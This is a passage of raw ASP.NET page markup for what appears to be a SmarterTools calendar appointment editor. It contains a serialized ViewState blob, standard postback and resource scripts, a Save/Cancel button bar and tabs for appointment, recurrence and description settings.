JBQZNb25kYXlkZGRkAgsPEA8WAh8JBQdUdWVzZGF5ZGRkZAINDxAPFgIfCQUJV2VkbmVzZGF5ZGRkZAIPDxAPFgIfCQUIVGh1cnNkYXlkZGRkAhEPEA8WAh8JBQZGcmlkYXlkZGRkAhMPEA8WAh8JBQhTYXR1cmRheWRkZGQCAg8WAh8FaBYKAgcPEA8WAh8JBQNEYXlkZGRkAgkPDxYCHwkFATJkZAILDxAPFgIfCQUDVGhlZGRkZAINDxBkDxYFZgIBAgICAwIEFgUQBQVmaXJzdAUFZmlyc3RnEAUGc2Vjb25kBQZzZWNvbmRnEAUFdGhpcmQFBXRoaXJkZxAFBmZvdXJ0aAUGZm91cnRoZxAFBGxhc3QFBGxhc3RnFgFmZAIPDxBkDxYHZgIBAgICAwIEAgUCBhYHEAUGTW9uZGF5BQZNb25kYXlnEAUHVHVlc2RheQUHVHVlc2RheWcQBQlXZWRuZXNkYXkFCVdlZG5lc2RheWcQBQhUaHVyc2RheQUIVGh1cnNkYXlnEAUGRnJpZGF5BQZGcmlkYXlnEAUIU2F0dXJkYXkFCFNhdHVyZGF5ZxAFBlN1bmRheQUGU3VuZGF5ZxYBAgZkAgMPFgIfBWgWDgIBDxAPFgIfCQUFRXZlcnlkZGRkAgMPEGQPFgxmAgECAgIDAgQCBQIGAgcCCAIJAgoCCxYMEAUHSmFudWFyeQUHSmFudWFyeWcQBQhGZWJydWFyeQUIRmVicnVhcnlnEAUFTWFyY2gFBU1hcmNoZxAFBUFwcmlsBQVBcHJpbGcQBQNNYXkFA01heWcQBQRKdW5lBQRKdW5lZxAFBEp1bHkFBEp1bHlnEAUGQXVndXN0BQZBdWd1c3RnEAUJU2VwdGVtYmVyBQlTZXB0ZW1iZXJnEAUHT2N0b2JlcgUHT2N0b2JlcmcQBQhOb3ZlbWJlcgUITm92ZW1iZXJnEAUIRGVjZW1iZXIFCERlY2VtYmVyZxYBAglkAgUPDxYCHwkFATJkZAIHDxAPFgIfCQUDVGhlZGRkZAIJDxBkDxYFZgIBAgICAwIEFgUQBQVmaXJzdAUFZmlyc3RnEAUGc2Vjb25kBQZzZWNvbmRnEAUFdGhpcmQFBXRoaXJkZxAFBmZvdXJ0aAUGZm91cnRoZxAFBGxhc3QFBGxhc3RnFgFmZAILDxBkDxYHZgIBAgICAwIEAgUCBhYHEAUGTW9uZGF5BQZNb25kYXlnEAUHVHVlc2RheQUHVHVlc2RheWcQBQlXZWRuZXNkYXkFCVdlZG5lc2RheWcQBQhUaHVyc2RheQUIVGh1cnNkYXlnEAUGRnJpZGF5BQZGcmlkYXlnEAUIU2F0dXJkYXkFCFNhdHVyZGF5ZxAFBlN1bmRheQUGU3VuZGF5ZxYBAgZkAg8PEGQPFgxmAgECAgIDAgQCBQIGAgcCCAIJAgoCCxYMEAUHSmFudWFyeQUHSmFudWFyeWcQBQhGZWJydWFyeQUIRmVicnVhcnlnEAUFTWFyY2gFBU1hcmNoZxAFBUFwcmlsBQVBcHJpbGcQBQNNYXkFA01heWcQBQRKdW5lBQRKdW5lZxAFBEp1bHkFBEp1bHlnEAUGQXVndXN0BQZBdWd1c3RnEAUJU2VwdGVtYmVyBQlTZXB0ZW1iZXJnEAUHT2N0b2JlcgUHT2N0b2JlcmcQBQhOb3ZlbWJlcgUITm92ZW1iZXJnEAUIRGVjZW1iZXIFCERlY2VtYmVyZxYBAglkAgQPFgIfBWgWCAIBDxAPFgIfCQUHRm9yZXZlcmRkZGQCAw8QDxYCHwkFCUVuZCBhZnRlcmRkZGQCCQ8QDxYCHwkFBkVuZCBieWRkZGQCCw8PFhAfIgYAQMr4o+jgBx8hBgBA21ytTs5IHyAGAABowSlcoQkfDWgfE2gfDwUMU21hcnRlclRvb2xzHwwFEkRhdGVQaWNrZXJPdmVycmlkZR8LAgJkFgZmDzwrAAgBAA8WEB8iBgBAyvij6OAHHwkFEzIwMTEtMTAtMDItMDAtMDAtMDAfChsAAAAAAABZQAcAAAAeBkhlaWdodBwfIAYAAGjBKVyhCR8NaB8TaB8LAoADZGQCAQ8PFgQfHgUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfKAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8pBTlyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX0VuZEJ5RGF0ZScpLCdjYWwnKTtkAgIPPCsADQEADxYUBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFD1JlbmRlckludmlzaWJsZWcFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUETWluRAYAQMr4o+jgBwUDRVJTaAUSTmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWF4RAYAAGjBKVyhCQ8WBh8PBQxTbWFydGVyVG9vbHMfE2gfDWhkZAIGD2QWAgIBD2QWAmYPZBYCZg8PFgQfDAUOSW5kZW50IFNldHRpbmcfCwICZGQCCA9kFgQCAw8PFgIfCQUBMGRkAgUPDxYCHwllZGQYBgUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjMPMtsLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAtAQ2F0ZWdvcmllcwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADHB2Q2F0ZWdvcmllcwtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiNA8y3gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADEBEZXNjcmlwdGlvbgH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADkRlc2NyaXB0aW9uVGFiC2QFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYUBRNjdGwwMCRNUEgkSW52aXRlQm94BSVjdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0BS5jdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBS5jdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBS5jdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JHRpbWVWaWV3BSNjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dAUsY3RsMDAkTVBIJEVuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQkY2FsZW5kYXIFLGN0bDAwJE1QSCRFbmREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBSxjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCR0aW1lVmlldwUgY3RsMDAkTVBIJGNoa0FsbERheV9TZXR0aW5nQ2hlY2sFD2N0bDAwJE1QSCRjdGwwNwUTY3RsMDAkTVBIJFJhZGlvT25jZQUUY3RsMDAkTVBIJFJhZGlvRGFpbHkFFGN0bDAwJE1QSCRSYWRpb0RhaWx5BRVjdGwwMCRNUEgkUmFkaW9XZWVrbHkFFWN0bDAwJE1QSCRSYWRpb1dlZWtseQUWY3RsMDAkTVBIJFJhZGlvTW9udGhseQUWY3RsMDAkTVBIJFJhZGlvTW9udGhseQUVY3RsMDAkTVBIJFJhZGlvWWVhcmx5BRVjdGwwMCRNUEgkUmFkaW9ZZWFybHkFE2N0bDAwJE1QSCRJbnZpdGVCb3gPFCsAAmVlZAUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjEPMuoLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAABxNYWluLkNhbGVuZGFyLmZybUV2ZW50X0V2ZW50AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMg8y9wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAK01haW4uQ2FsZW5kYXIuZnJtRXZlbnRfUmVjdXJyaW5nSW5mb3JtYXRpb24B9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAAhSZWN1clRhYgtkRcx7RNc3ubRBkVJrNdHN+ssgbBY=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQcUaVolINSsSmd45xIt6vT0&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWR9MeV9ZUBGsbQORxp8pY6I0fjnZzGUp1Vh7LOm8VmDBQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTHsMiNv2PssDy2oWnNIalhcjZ1QwtIXXc3SVK-m6b1iA2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQOOpbZd4spU5Za-fe5gsk_TGJ7p2LglcqEgnY_BuugY1rcRcETGazrPInjQjArgnA1&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQKd6cLeOoAf-9D7gVa8Xu13DeXG_rtn3Ws_5NPCB7hvA2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQSEppX2FX7xGjssjmzh3aozGMCNxIa5fXHK-5EksyX-g2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWRRnleWjMZxbEwU_E-8AjN5PYJXDckj9QOT-WQBoClmsHYyyS9JSXD6F_jvWWBGqo01&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQOy5RBkrirLHJx_V0Tl-SEpzLhS3ytBc6dHK_b8SuhHQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFnLh1zs6-mYZ3jYkwjGi5OOeB5q262XchWnUM37uuuc4u4Eh6ZtFqwIWQgZDUBELcg2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFnLh1zs6-mYZ3jYkwjGi5OPZvXc391HAbgs03L_o9VOK82B8IiiN14y-pdC8rPOEvdX6kxin3NUH_a3R6GADuX01&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1PWslctYv3SyMb4XUFYFVUAUmpHu3v1jth73Pi-k7Mak1&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1o6y_K2I5aF0r3HOKggytHw2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = false;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$ctl00'], ['ctl00$BPH$SaveTextImageButton'], [], 90);
//]]>
</script>

       
           
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_SaveTextImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$SaveTextImageButton',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_btnManageCategories" class="BBButton"><a class="ButtonBarAnchor" href="javascript%3aOpenMasterCategoriesPopup%28%29" onclick="window.location.href = 'javascript\x3aOpenMasterCategoriesPopup\x28\x29'; return false;" tabindex='0'><span class="BBInner">Master Categories</span></a></div>
   

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelTextImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="window.close();; return false;"><span class="BBInner">Cancel</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Appointment</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Recurrence Information</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_TabStrip_Tab4'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Description</span></span></a></li>
